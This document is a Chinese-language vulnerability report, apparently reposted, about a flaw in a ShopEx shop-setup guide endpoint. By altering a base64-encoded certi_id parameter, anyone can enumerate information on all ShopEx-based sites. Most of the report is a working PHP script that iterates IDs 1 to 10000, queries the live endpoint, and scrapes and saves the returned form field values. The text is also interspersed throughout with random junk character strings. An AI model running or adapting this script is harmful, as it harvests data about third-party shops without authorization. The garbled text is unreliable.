|
|
简要描述:
$ |& U' N9 Y, E0 M% J! R! o5 gShopEx某接口缺陷,可遍历所有网站4 Z x! u4 f4 c" _: V
详细说明:2 b8 c! c0 e1 Z! K3 Z* K- L- d
问题出现在shopex 网店使用向导页面 8 |& ?4 U- O0 {7 D( t
. [. s. W P, d( d' h6 L' \/ y' a- M2 f- a2 [ s$ D. R& T
& S1 C! o& q$ Z2 B Z/ c$ Nhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=0 b3 y. S) e5 G
' k: e) `' C( Q; R9 f+ Q$ U8 Q6 b+ Q# O% s. K
- {0 B2 @; U+ W% G6 X9 v! a6 S
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}5 N5 S# B/ G \7 S% r# A
4 x0 h: x1 [7 H6 @3 U' E: B1 p5 @' U
: s- e5 ]) Q' k
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
9 P/ r1 [) |" R$ C/ J* I/ _
: M# f* I3 C- P5 U. w
) ~* c& X7 M3 ]. a& S3 o+ i/ N. Q/ ~; v3 M ~; k: ]+ k
<?php
( X. z: e/ M C4 Z1 R: O- T
8 R- U6 F( `, H3 Y" }; Q: W- w% N for ($i=1; $i < 10000; $i++) { //遍历2 x* W9 [/ h- a" l
1 F1 F- C: F( p1 \! a ShowshopExD($i);
: ]; y5 A' l) j0 _1 M8 m0 b- D6 R' T! b. @, V
}
& ^5 C# {5 j/ _, C$ l) Y# g1 z$ D# q& y) E8 ?
function ShowshopExD($cid) {
7 F" |! ?% h7 G" _# }+ F* j8 j, G( v; F
$url='http://guide.ecos.shopex.cn/step2.php';8 _) _- {5 G/ Y1 N2 X2 N
! ]: ]# R5 D, J2 U; H3 { k8 w
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
$ ~) I5 T# O$ b0 w, W" i$ q! z$ h2 }4 S/ x7 m! t
$url = $url.'?refer='.$refer;
* b; z% J( H& h4 d
$ j, _4 w; C5 m* I) h0 e $ch = curl_init($url);6 ~/ y3 r# w" c1 {* t; b
- y B6 ?$ E9 v& S) p
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;9 R3 H) ]$ R9 i' m
# W! h" d, R* V* V
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;( } A! p6 |4 [3 a& T1 @
# b% `; K1 W% Q6 P* i
$result = curl_exec($ch);
E$ N" W$ m0 {1 C& X+ {- P/ z2 C: I% x- \. M
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
! s+ R O/ [0 o! M% O4 F3 F2 K. G9 _3 f7 j
if(strpos($result,$refer))' a6 c. M% Z4 ~5 z! F
2 j& E6 S) M r) b8 D) @( T
{& N2 M, L9 n$ o, D% K: h8 N
5 Y8 c: x" v; R0 Z% `& L $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
0 @$ [8 r1 r5 n
3 n# I6 M9 ]8 m3 g preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);( ~& L8 L8 J1 U+ T
. Z6 |, y" \2 [* X, F) I' C foreach ($value[1] as $key) {
$ U4 e* R5 M# o. S+ T3 p0 v2 i" s
5 w3 [, G, H, T- M4 `/ Y. @" n preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
' W& _) D& W' {) g5 Q( g/ o) ?, }' Z# t
echo $res[1][0].':'.$res[3][0]."\r\n";( R% X. j6 e5 K3 o" [0 _/ A6 p
U6 H/ ~ B9 O w1 W
$col =$res[1][0].':'.$res[3][0]."\r\n";
- y/ N; _; Z/ H, m5 e4 p0 w
' z! p& W5 G: x) e fwrite($fp, $col, strlen($col));
: t2 @& C5 f9 W# I- Z+ m0 S- R0 I$ Q. K! {* s/ N# Q, ^
}3 y& U5 f8 ]% g
# t3 M2 S) r) }, M b; M6 | echo '--------------------------------'."\r\n";0 O* k$ x" u6 {8 J/ T6 x
' m7 H! |% i6 h/ j fclose($fp);
, H2 Z, w6 G9 _# M. @7 o) t R l0 m
, y" q+ [, G4 W0 ~ }
+ ~- R5 j3 N- X7 E6 T2 _
0 {9 @0 Z/ q* P) z. W flush();
8 W1 R M8 ~3 \5 p4 D; I% H2 q
! C( O( p I7 ^$ _ curl_close($ch);/ x" u! z$ r3 ^
) [( h, _. G& l) ]$ U% n
}
( m4 w! _+ ]: O% G- U$ Z. f) D9 U0 Y% s+ z7 I- O# I% s8 D
?>: I* v$ G6 {0 k1 H t' q2 U$ Q
漏洞证明:7 T+ |* k7 v) i
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg% r; w& a4 E) S# ]
refer换成其他加密方式9 {1 Z( J" ~$ ^; m
|
|